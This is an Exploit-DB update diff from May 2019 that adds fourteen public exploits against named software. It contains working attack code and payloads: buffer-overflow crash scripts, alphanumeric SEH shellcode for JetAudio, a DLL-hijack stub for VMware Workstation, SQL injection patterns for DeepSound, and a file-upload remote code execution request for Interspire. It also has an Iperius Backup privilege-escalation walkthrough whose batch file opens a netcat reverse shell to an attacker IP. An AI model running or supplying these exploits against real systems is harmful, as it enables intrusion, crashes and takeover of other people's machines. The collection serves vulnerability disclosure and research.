DB: 2019-05-18

14 changes to exploits/shellcodes

Sandboxie 5.30 - 'Programs Alerts' Denial of Service (PoC)
CEWE Photoshow 6.4.3 - 'Password' Denial of Service (PoC)
CEWE Photo Importer 6.4.3 - '.jpg' Denial of Service (PoC)
WeChat for Android 7.0.4 - 'vcodec2_hls_filter' Denial of Service
ZOC Terminal 7.23.4 - 'Script' Denial of Service (PoC)
ZOC Terminal v7.23.4 - 'Private key file' Denial of Service (PoC)
ZOC Terminal v7.23.4 - 'Shell' Denial of Service (PoC)
Axessh 4.2 - 'Log file name' Denial of Service (PoC)
SEL AcSELerator Architect 2.2.24 - CPU Exhaustion Denial of Service
Iperius Backup 6.1.0 - Privilege Escalation
VMware Workstation 15.1.0 - DLL Hijacking
JetAudio jetCast Server 2.0 - 'Log Directory' Local SEH Alphanumeric Encoded Buffer Overflow
DeepSound 1.0.4 - SQL Injection
Interspire Email Marketer 6.20 - 'surveys_submit.php' Remote Code Execution

exploits/android/dos/46853.txt

@@ -0,0 +1,55 @@
+# Exploit Title: DoS Wechat with an emoji
+# Date: 16-May-2019
+# Exploit Author: Hong Nhat Pham
+# Vendor Homepage: http://www.tencent.com/en-us/index.html
+# Software Link: https://play.google.com/store/apps/details?id=com.tencent.mm
+# Version: 7.0.4
+# Tested on: Android 9.0
+# CVE : CVE-2019-11419
+
+Description:
+vcodec2_hls_filter in libvoipCodec_v7a.so in WeChat application for
+Android results in a DoS by replacing an emoji file (under the
+/sdcard/tencent/MicroMsg directory) with a crafted .wxgf file.
+Crash-log is provided in poc.zip file at
+https://drive.google.com/open?id=1HFQtbD10awuUicdWoq3dKVKfv0wvxOKS
+
+Vulnerability Type:
+Denial of Service
+
+Vendor of Product:
+Tencent
+
+Affected Product Code Base:
+WeChat for Android - Up to latest version (7.0.4)
+
+Affected Component:
+Function vcodec2_hls_filter in libvoipCodec_v7a.so
+
+Attack Type:
+Local
+
+Attack vector:
+An malware app can crafts a malicious emoji file and overwrites the
+emoji files under /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID].
+Once the user opens any chat messages that contain an emoji, WeChat
+will instantly crash.
+
+POC:
+Video at https://drive.google.com/open?id=1x1Z3hm4j8f4rhv_WUp4gW-bhdtZMezdU
+
+User must have sent or received a GIF file in WeChat
+Malware app must retrieve the phone’s IMEI. For POC, we can use the
+below command
+adb shell service call iphonesubinfo 1 | awk -F "'" '{print $2}' | sed
+'1 d' | tr -d '.' | awk '{print}' ORS=-
+Produce the malicious emoji file with the retrieved IMEI (use
+encrypt_wxgf.py in poc.zip):
+python encrypt.py crash4.wxgf [SIZE_OF_EMOJI_ON_SDCARD]
+Replace /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID] with the
+padded out.wxgf.encrypted
+WeChat will crash now if a message that contains the overwritten emoji file
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46853.zip

exploits/php/webapps/46852.txt

@@ -0,0 +1,72 @@
+===========================================================================================
+# Exploit Title: DeepSound 1.0.4 - SQL Inj.
+# Dork: N/A
+# Date: 15-05-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage:
+https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
+# Software Link:
+https://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/
+# Version: v1.0.4
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: DeepSound is a music sharing script, DeepSound is
+the best way to start your own music website!
+===========================================================================================
+# POC - SQLi
+# Parameters : search_keyword
+# Attack Pattern : %27 aNd 9521793=9521793 aNd %276199%27=%276199
+# POST Method :
+http://localhost/Script/search/songs/style?filter_type=songs&filter_search_keyword=style&search_keyword=style[SQL
+Inject Here]
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: DeepSound 1.0.4 - SQL Inj.
+# Dork: N/A
+# Date: 15-05-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage:
+https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
+# Software Link:
+https://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/
+# Version: v1.0.4
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: DeepSound is a music sharing script, DeepSound is
+the best way to start your own music website!
+===========================================================================================
+# POC - SQLi
+# Parameters : description
+# Attack Pattern : %27) aNd if(length(0x454d49524f474c55)>1,sleep(3),0)
+--%20
+# POST Method : http://localhost/Script/admin?id=&description=[TEXT
+INPUT]2350265[SQL Inject Here]
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: DeepSound 1.0.4 - SQL Inj.
+# Dork: N/A
+# Date: 15-05-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage:
+https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
+# Software Link:
+https://forum.islup.online/files/file/15-deepsound-104-nulled-a-platform-for-sharing-music-for-php/
+# Version: v1.0.4
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: DeepSound is a music sharing script, DeepSound is
+the best way to start your own music website!
+===========================================================================================
+# POC - SQLi
+# Parameters : password
+# Attack Pattern : %22) aNd 7595147=7595147 aNd (%226199%22)=(%226199
+# POST Method :
+http://localhost/Script/search/songs/general?username=4929700&password=2802530[SQL
+Inject Here]
+===========================================================================================
+###########################################################################################

exploits/php/webapps/46864.txt

@@ -0,0 +1,96 @@
+# Exploit Title: Interspire Email Marketer 6.20 - Remote Code Execution
+# Date: May 2019
+# Exploit Author: Numan Türle
+# Vendor Homepage: https://www.interspire.com
+# Software Link: https://www.interspire.com/emailmarketer
+# Version: 6.20< 
+# Tested on: windows
+# CVE : CVE-2018-19550
+# https://medium.com/@numanturle/interspire-email-marketer-6-20-exp-remote-code-execution-via-uplaod-files-27ef002ad813
+
+
+surveys_submit.php
+if (isset($_FILES['widget']['name'])) {
+             $files = $_FILES['widget']['name'];
+
+             foreach ($files as $widgetId => $widget) {
+                 foreach ($widget as $widgetKey => $fields) {
+                     foreach ($fields as $fieldId => $field) {
+                         // gather file information
+                         $name    = $_FILES['widget']['name'][$widgetId]['field'][$fieldId]['value'];
+                         $type    = $_FILES['widget']['type'][$widgetId]['field'][$fieldId]['value'];
+                         $tmpName = $_FILES['widget']['tmp_name'][$widgetId]['field'][$fieldId]['value'];
+                         $error   = $_FILES['widget']['error'][$widgetId]['field'][$fieldId]['value'];
+                         $size    = $_FILES['widget']['size'][$widgetId]['field'][$fieldId]['value'];
+
+                         // if the upload was successful to the temporary folder, move it
+                         if ($error == UPLOAD_ERR_OK) {
+                             $tempdir   = TEMP_DIRECTORY;
+                             $upBaseDir = $tempdir . DIRECTORY_SEPARATOR . 'surveys';
+                             $upSurveyDir = $upBaseDir . DIRECTORY_SEPARATOR . $formId;
+                             $upDir     = $upSurveyDir . DIRECTORY_SEPARATOR . $response->GetId();
+
+                             // if the base upload directory doesn't exist create it
+                             if (!is_dir($upBaseDir)) {
+                                 mkdir($upBaseDir, 0755);
+                             }
+
+                             if (!is_dir($upSurveyDir)) {
+                                 mkdir($upSurveyDir, 0755);
+                             }
+
+                             // if the upload directory doesn't exist create it
+                             if (!is_dir($upDir)) {
+                                 mkdir($upDir, 0755);
+                             }
+
+                             // upload the file
+                             move_uploaded_file($tmpName, $upDir . DIRECTORY_SEPARATOR . $name);
+                         }
+                     }
+                 }
+             }
+         }
+
+input file name : widget[0][field][][value]
+submit : surveys_submit.php?formId=1337
+
+
+POST /iem/surveys_submit.php?formId=1337 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryF2dckZgrcE306kH2
+Content-Length: 340
+
+------WebKitFormBoundaryF2dckZgrcE306kH2
+Content-Disposition: form-data; name="widget[0][field][][value]"; filename="info.php"
+Content-Type: application/octet-stream
+
+<?php
+phpinfo();
+?>
+------WebKitFormBoundaryF2dckZgrcE306kH2
+Content-Disposition: form-data; name="submit"
+
+Submit
+------WebKitFormBoundaryF2dckZgrcE306kH2-
+
+####
+
+POC
+
+<!DOCTYPE HTML>
+<html lang="en-US">
+<head>
+    <meta charset="UTF-8">
+    <title></title>
+</head>
+<body>
+<form action="http://WEBSITE/surveys_submit.php?formId=1337" method="post" enctype="multipart/form-data">
+    <input type="file" name="widget[0][field][][value]">
+    <input type="submit" value="submit" name="submit">
+</form>
+</body>
+</html>
+
+URL : http://{{IEM LINK}}/admin/temp/surveys/1337/{{FUZZING NUMBER}}/{{FILENAME}}

exploits/windows/dos/46855.py

@@ -0,0 +1,20 @@
+#Exploit Title:  ZOC Terminal v7.23.4  - 'Script' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-15
+#Vendor Homepage: https://www.emtec.com
+#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
+#Tested Version: 7.23.4
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: ZOC_Terminal_scr.py and it will create a new file "exp.zrx"
+#2.- Open ZOC Terminal
+#3.- Select Script > Start REXX Script... 
+#4.- Select "exp.zrx" file and click "open"
+#5.- Crashed
+
+cod = "\x41" * 20000
+
+f = open('exp.zrx', 'w')
+f.write(cod)
+f.close()

exploits/windows/dos/46856.py

@@ -0,0 +1,22 @@
+#Exploit Title:  ZOC Terminal v7.23.4  - 'Private key file' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-15
+#Vendor Homepage: https://www.emtec.com
+#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
+#Tested Version: 7.23.4
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: ZOC_Terminal_pkf.py
+#2.- Open zoc_pkf.txt and copy content to clipboard
+#3.- Open ZOC Terminal
+#4.- Select File > Create SSH Key Files... 
+#5.- Select "Private key file:" field erease and Paste ClipBoard 
+#6.- Click on "Create public/private key files..."
+#7.- Crashed
+
+cod = "\x41" * 2000
+
+f = open('zoc_pkf.txt', 'w')
+f.write(cod)
+f.close()

exploits/windows/dos/46857.py

@@ -0,0 +1,23 @@
+#Exploit Title:  ZOC Terminal v7.23.4  - 'Shell' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-15
+#Vendor Homepage: https://www.emtec.com
+#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
+#Tested Version: 7.23.4
+#Tested on: Windows 7 Service Pack 1 x64
+
+#Steps to produce the crash:
+#1.- Run python code: ZOC_Terminal_sh.py
+#2.- Open zoc_sh.txt and copy content to clipboard
+#3.- Open ZOC Terminal
+#4.- Select Options > Program Settings... > Special Files
+#5.- Select "Shell" field erease the content and Paste ClipBoard 
+#6.- Click on "Save"
+#7.- Select View > "Command Shell" and select "ok"
+#8.- Crashed
+
+cod = "\x41" * 270
+
+f = open('zoc_sh.txt', 'w')
+f.write(cod)
+f.close()

exploits/windows/dos/46858.py

@@ -0,0 +1,23 @@
+#Exploit Title: Axessh 4.2 'Log file name' - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-14
+#Vendor Homepage: http://www.labf.com
+#Software Link: http://www.labf.com/download/axessh.exe
+#Tested Version: 4.2
+#Tested on: Windows 7 Service Pack 1 x32
+
+#Steps to produce the crash:
+#1.- Run python code: Axessh_4.2.py
+#2.- Open Axess.txt and copy content to clipboard
+#3.- Open Axessh.exe
+#4.- In "Telnet Connect Host" select "Details>>" > "Settings"
+#5.- Select "Logging" and enable "Log all sessions output"
+#6.- In "Log file name" paste Clipboard
+#7.- Select "OK" and in "Telnet Connect Host" select "Ok"
+#8.- Crashed
+
+cod = "\x41" * 500
+
+f = open('Axess.txt', 'w')
+f.write(cod)
+f.close()

exploits/windows/dos/46859.py

@@ -0,0 +1,69 @@
+#!/usr/bin/env python
+# coding: utf8
+#
+#
+# SEL AcSELerator Architect 2.2.24 Remote CPU Exhaustion Denial of Service
+#
+#
+# Vendor: Schweitzer Engineering Laboratories, Inc.
+# Product web page: https://www.selinc.com
+# Affected version: 2.2.24.0 (ICD package version: 2.38.0)
+#
+# Summary: Substation communications networks using the IEC 61850
+# MMS and GOOSE protocols require a systemic methodology to configure
+# message publications and subscriptions. acSELerator Architect
+# SEL-5032 Software is a Microsoft Windows application that streamlines
+# the configuration and documentation of IEC 61850 control and SCADA
+# communications.
+#
+# Description: AcSELerator Architect is prone to a denial-of-service (DoS)
+# vulnerability. An attacker may exploit this issue to cause CPU exhaustion,
+# resulting in application rendered non-responsive (AppHangB1 event).
+#
+# Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#
+#
+# Advisory: https://applied-risk.com/index.php/download_file/view/106/165
+# ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-18-191-02
+# CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10608
+#
+# 22.02.2018
+#
+
+from pwn import *
+
+cool_data = '\x4A' * 54321
+
+def bunn():
+
+    print """
+    ####################################
+     SEL AcSELerator Architect 2.2.24.0
+      FTP Client Remote CPU Exhaustion
+                 
+                 (c) 2018
+    ####################################
+    """
+
+def main():
+
+    p = listen(2121)
+    try:
+        log.warn('Payload ready for deployment...(Ctrl-C for exit)\n')
+        while True:
+            p.wait_for_connection()
+            if p:
+                sys.stdout.write('▓≡')
+                p.send(cool_data)
+    except KeyboardInterrupt:
+        p.success('OK!')
+        p.close()
+    except EOFError:
+        print "Unexpected error brah:", sys.exc_info()[0]
+        p.close()
+
+if __name__ == '__main__':
+    bunn()
+    main()

exploits/windows/dos/46860.py

@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Sandboxie 5.30 - Denial of Service (PoC)
+# Date: 16/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://www.sandboxie.com
+# Software https://www.sandboxie.com/SandboxieInstall.exe
+# Version: 5.30
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script 'Sandboxie.py', it will create a new file 'Sandboxie.txt'
+# 2.- Copy the text from the generated Sandboxie.txt file to clipboard
+# 3.- Open Sandboxie Control
+# 4.- Go to 'Configure' > 'Programs Alerts'
+# 5.- Click 'Add Program', paste clipboard in the field 'Select or enter a program' and click 'OK'
+# 6.- Click 'OK' and crashed
+
+buffer = "\x41" * 5000
+
+f = open ("Sandboxie.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows/dos/46861.py

@@ -0,0 +1,21 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: CEWE PHOTO SHOW 6.4.3 - Denial of Service (PoC)
+# Date: 16/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://cewe-photoworld.com/
+# Software: https://cewe-photoworld.com/creator-software/windows-download
+# Version: 6.4.3
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script 'photoshow.py', it will create a new file 'photoshow.txt'
+# 2.- Copy the text from the generated photoshow.txt file to clipboard
+# 3.- Open CEWE PHOTO SHOW
+# 4.- Click 'Upload'
+# 5.- Paste clipboard in the field 'Password' and crashed
+
+buffer = "\x41" * 5000
+
+f = open ("photoshow.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows/dos/46862.py

@@ -0,0 +1,20 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: CEWE PHOTO IMPORTER 6.4.3 - Denial of Service (PoC)
+# Date: 16/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://cewe-photoworld.com/
+# Software: https://cewe-photoworld.com/creator-software/windows-download
+# Version: 6.4.3
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script 'photoimporter.py',it will create a new file "sample.jpg"
+# 2.- Open CEWE PHOTO IMPORTER
+# 3.- Select the 'sample.jpg' file created and click 'Import all'
+# 4.- Click 'Next' and 'Next', you will see a crash
+
+buffer = "\x41" * 500000
+
+f = open ("sample.jpg", "w")
+f.write(buffer)
+f.close()

exploits/windows/local/46851.txt

@@ -0,0 +1,34 @@
+#---------------------------------------------------------
+# Title: VMware Workstation DLL hijacking < 15.1.0
+# Date: 2019-05-14
+# Author: Miguel Mendez Z. & Claudio Cortes C.
+# Team: www.exploiting.cl
+# Vendor: https://www.vmware.com
+# Version: VMware Workstation Pro / Player (Workstation)
+# Tested on: Windows Windows 7_x86/7_x64 [eng]
+# Cve: CVE-2019-5526
+#---------------------------------------------------------
+
+
+Description:
+
+VMware Workstation contains a DLL hijacking issue because some DLL.
+
+
+DLL Hijacking: shfolder.dll
+Hooking: SHGetFolderPathW()
+
+------Code_Poc-------
+#include "dll.h"
+#include <windows.h>
+
+DLLIMPORT void SHGetFolderPathW()
+{
+MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION);
+exit(0);
+}
+
+--------------------------
+
+
+https://www.vmware.com/security/advisories/VMSA-2019-0007.html

exploits/windows/local/46854.py

@@ -0,0 +1,88 @@
+# Title: JetAudio jetCast Server 2.0 'Log Directory' Local SEH Alphanumeric Encoded Buffer Overflow
+# Date: May 13th, 2019
+# Author: Connor McGarr (https://connormcgarr.github.io)
+# Vendor Homepage: http://www.jetaudio.com/
+# Software Link: http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/Download/jetCast/build/JCS2000.exe
+# Version v2.0
+# Tested on: Windows XP SP3 EN
+
+# TO RUN:
+# 1. Run python script
+# 2. Copy contents of pwn.txt
+# 3. Open jetCast
+# 4. Select Config
+# 5. Paste contents of pwn.txt into "Log directory" field
+# 6. Click "OK"
+# 7. Click "Start"
+
+# For zeroing out registers before manual shellcode
+zero = "\x25\x01\x01\x01\x01"           	# and eax, 0x01010101
+zero += "\x25\x10\x10\x10\x10"          	# and eax, 0x10101010
+
+# Save old stack pointer
+restore = "\x54"                                # push esp
+restore += "\x59"                               # pop ecx
+restore += "\x51"                               # push ecx
+
+# Align the stack to 0012FFAD. Leaving enough room for shell. Using calc.exe for now.
+# 4C4F5555 4C4F5555 4D505555
+alignment = "\x54"				# push esp
+alignment += "\x58"				# pop eax
+alignment += "\x2d\x4c\x4f\x55\x55"		# and eax, 0x4C4F5555
+alignment += "\x2d\x4c\x4f\x55\x55"		# and eax, 0x4C4F5555
+alignment += "\x2d\x4d\x50\x55\x55"		# and eax, 0x4D505555
+alignment += "\x50"				# push eax
+alignment += "\x5c"				# pop esp
+
+# calc.exe - once again, giving you enough room with alignment for shell. Calc.exe for now.
+# 2C552D14 01552D14 01562E16
+shellcode = zero
+shellcode += "\x2d\x14\x2d\x55\x2c" 		# sub eax, 0x2C552D14
+shellcode += "\x2d\x14\x2d\x55\x01" 		# sub eax, 0x01562D14
+shellcode += "\x2d\x16\x2e\x56\x01" 		# sub eax, 0x01562E16
+shellcode += "\x50" 				# push eax
+
+# 24121729 24121739 2414194A
+shellcode += zero
+shellcode += "\x2d\x29\x17\x12\x24" 		# sub eax, 0x24121729
+shellcode += "\x2d\x39\x17\x12\x24"     	# sub eax, 0x24121739
+shellcode += "\x2d\x4a\x19\x14\x24"     	# sub eax, 0x2414194A (was 40 at the end, but a miscalc happened. Changed to 4A)
+shellcode += "\x50" 				# push eax
+
+# 34313635 34313434 34313434
+shellcode += zero
+shellcode += "\x2d\x35\x36\x31\x34" 		# sub eax, 0x34313635
+shellcode += "\x2d\x34\x34\x31\x34" 		# sub eax, 0x34313434
+shellcode += "\x2d\x34\x34\x31\x34" 		# sub eax, 0x34313434
+shellcode += "\x50" 				# push eax
+
+# 323A1245 323A1245 333A1245
+shellcode += zero
+shellcode += "\x2d\x45\x12\x3a\x32" 		# sub eax, 0x323A1245
+shellcode += "\x2d\x45\x12\x3a\x32" 		# sub eax, 0x323A1245
+shellcode += "\x2d\x45\x12\x3a\x33" 		# sub eax, 0x333A1245
+shellcode += "\x50"				# push eax
+
+# Restore old stack pointer. MOV ECX,ESP
+move = zero
+move += "\x2d\x40\x3f\x27\x11" 			# sub eax, 0x403F2711
+move += "\x2d\x3f\x3f\x27\x11" 			# sub eax, 0x3F3F2711
+move += "\x2d\x3f\x3f\x28\x11" 			# sub eax, 0x3F3F2811
+move += "\x50" 					# push eax
+
+
+payload = "\x41" * 520
+payload += "\x70\x06\x71\x06"			# JO 6 bytes. If jump fails, default to JNO 6 bytes into shellcode.
+payload += "\x2d\x10\x40\x5f"			# pop pop ret MFC42.DLL
+payload += "\x41" * 2				# Padding to reach first instruction
+payload += restore
+payload += alignment
+payload += shellcode
+payload += move
+# Using ECX for holding old ESP. \x41 = INC ECX
+# so using \x42 = INC EDX instead.
+payload += "\x42" * (5000-len(payload))
+
+f = open('pwn.txt', 'w')
+f.write(payload)
+f.close()

exploits/windows/local/46863.txt

@@ -0,0 +1,62 @@
+Exploit Author: bzyo
+Twitter: @bzyo_
+Exploit Title: Iperius Backup 6.1.0 - Privilege Escalation
+Date: 04-24-19
+Vulnerable Software: Iperius Backup 6.1.0
+Vendor Homepage: https://www.iperiusbackup.com/
+Version: 6.1.0
+Software Link: https://www.iperiusbackup.com/download.aspx
+Tested on: Windows 10 x64
+
+Details:
+Iperius Backup Service must run as Local System or a system administrator. By default the application allows for low privilege users to create/run backup jobs and edit existing jobs due to file permissions.  An option when creating a backup job is to run a program before or after the backup job.  The backup job is run as the user of the running service, as such the program requested to run before or after a backup job is run as that same user.  A low privilege user could abuse this and escalate their privileges to either local system or an administrator account.
+
+Vendor Post - Installation as Windows service: what it is and why it’s important
+https://www.iperiusbackup.net/en/installation-windows-service-iperius-backup/
+
+Prerequisites:
+To successfully exploit this vulnerability, an attacker must already have local access 
+to a system running Iperius Backup and Iperius Backup Service using a
+low privileged user account
+
+Exploit:
+1. Login as low privilege user where Iperius Backup and Iperius Backup Service are installed
+
+2. Download netcat  from attacking machine
+	 c:\users\low\downloads\nc.exe
+	 
+3. Create batch file calling netcat and sending command prompt to attacking machine
+	c:\users\low\desktop\evil.bat
+		@echo off
+		c:\users\low\downloads\nc.exe 192.168.0.163 443 -e cmd.exe
+
+4. Setup listener on attacking machine
+	nc -nlvvp 443
+
+5. Open Iperius Backup and create new backup job
+	- set any folder to backup (c:\temp)
+	- set to any destination (c:\users\low\desktop)
+	- set program to run before backup job (c:\users\low\desktop\evil.bat)
+
+6. Right-click on newly created job and select "Run backup service as"
+	- will either be local system or administrator account
+
+7. Command prompt on attacking machine will appear
+	C:\Program Files (x86)\Iperius Backup>whoami
+	whoami
+	<computer name>\<administrator>
+
+	Or
+	
+	C:\Program Files (x86)\Iperius Backup>whoami
+	whoami
+	nt authority\system
+
+Risk:
+The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System or Administrator
+
+Notes:
+Able to open elevated command prompt locally if service is running as local system, but not when using an administrator account.  Also able to backup entire administrator user profile as low privilege account.
+
+Fix:
+Remove Everyone permission to folder c:\ProgramData\IperiusBackup

files_exploits.csv

@@ -6421,12 +6421,21 @@ id,file,description,date,author,type,platform,port
 46824,exploits/windows/dos/46824.py,"PHPRunner 10.1 - Denial of Service (PoC)",2019-05-10,"Victor Mondragón",dos,windows,
 46830,exploits/windows/dos/46830.py,"SpotMSN 2.4.6 - Denial of Service (PoC)",2019-05-13,"Victor Mondragón",dos,windows,
 46831,exploits/windows/dos/46831.py,"DNSS 2.1.8 - Denial of Service (PoC)",2019-05-13,"Victor Mondragón",dos,windows,
+46860,exploits/windows/dos/46860.py,"Sandboxie 5.30 - 'Programs Alerts' Denial of Service (PoC)",2019-05-17,"Alejandra Sánchez",dos,windows,
+46861,exploits/windows/dos/46861.py,"CEWE Photoshow 6.4.3 - 'Password' Denial of Service (PoC)",2019-05-17,"Alejandra Sánchez",dos,windows,
+46862,exploits/windows/dos/46862.py,"CEWE Photo Importer 6.4.3 - '.jpg' Denial of Service (PoC)",2019-05-17,"Alejandra Sánchez",dos,windows,
 46837,exploits/multiple/dos/46837.html,"Google Chrome V8 - Turbofan JSCallReducer::ReduceArrayIndexOfIncludes Out-of-Bounds Read/Write",2019-05-13,"Google Security Research",dos,multiple,
 46842,exploits/windows/dos/46842.py,"Selfie Studio 2.17 - 'Resize Image' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
 46843,exploits/windows/dos/46843.py,"TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
 46844,exploits/windows/dos/46844.py,"TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
 46845,exploits/windows/dos/46845.py,"TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows,
 46848,exploits/windows/dos/46848.py,"Tomabo MP4 Converter 3.25.22 - Denial of Service (PoC)",2019-05-15,"Alejandra Sánchez",dos,windows,
+46853,exploits/android/dos/46853.txt,"WeChat for Android 7.0.4 - 'vcodec2_hls_filter' Denial of Service",2019-05-16,"Hong Nhat Pham",dos,android,
+46855,exploits/windows/dos/46855.py,"ZOC Terminal 7.23.4 - 'Script' Denial of Service (PoC)",2019-05-16,"Victor Mondragón",dos,windows,
+46856,exploits/windows/dos/46856.py,"ZOC Terminal v7.23.4 - 'Private key file' Denial of Service (PoC)",2019-05-16,"Victor Mondragón",dos,windows,
+46857,exploits/windows/dos/46857.py,"ZOC Terminal v7.23.4 - 'Shell' Denial of Service (PoC)",2019-05-16,"Victor Mondragón",dos,windows,
+46858,exploits/windows/dos/46858.py,"Axessh 4.2 - 'Log file name' Denial of Service (PoC)",2019-05-16,"Victor Mondragón",dos,windows,
+46859,exploits/windows/dos/46859.py,"SEL AcSELerator Architect 2.2.24 - CPU Exhaustion Denial of Service",2019-05-16,LiquidWorm,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10473,6 +10482,9 @@ id,file,description,date,author,type,platform,port
 46802,exploits/windows/local/46802.txt,"NSClient++ 0.5.2.35 - Privilege Escalation",2019-05-06,bzyo,local,windows,
 46805,exploits/windows/local/46805.py,"Admin Express 1.2.5.485 - 'Folder Path' Local SEH Alphanumeric Encoded Buffer Overflow",2019-05-07,"Connor McGarr",local,windows,
 46807,exploits/linux/local/46807.txt,"MiniFtp - 'parseconf_load_setting' Buffer Overflow",2019-05-08,strider,local,linux,
+46863,exploits/windows/local/46863.txt,"Iperius Backup 6.1.0 - Privilege Escalation",2019-05-17,bzyo,local,windows,
+46851,exploits/windows/local/46851.txt,"VMware Workstation 15.1.0 - DLL Hijacking",2019-05-16,"Miguel Mendez Z. & Claudio Cortes C.",local,windows,
+46854,exploits/windows/local/46854.py,"JetAudio jetCast Server 2.0 - 'Log Directory' Local SEH Alphanumeric Encoded Buffer Overflow",2019-05-16,"Connor McGarr",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41275,3 +41287,5 @@ id,file,description,date,author,type,platform,port
 46847,exploits/php/webapps/46847.txt,"PasteShr 1.6 - Multiple SQL Injection",2019-05-14,"Mehmet EMIROGLU",webapps,php,80
 46849,exploits/php/webapps/46849.txt,"CommSy 8.6.5 - SQL injection",2019-05-15,"Jens Regel_ Schneider_ Wulf",webapps,php,
 46850,exploits/php/webapps/46850.txt,"Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting",2019-05-15,LiquidWorm,webapps,php,
+46852,exploits/php/webapps/46852.txt,"DeepSound 1.0.4 - SQL Injection",2019-05-16,"Mehmet EMIROGLU",webapps,php,80
+46864,exploits/php/webapps/46864.txt,"Interspire Email Marketer 6.20 - 'surveys_submit.php' Remote Code Execution",2019-05-17,"numan türle",webapps,php,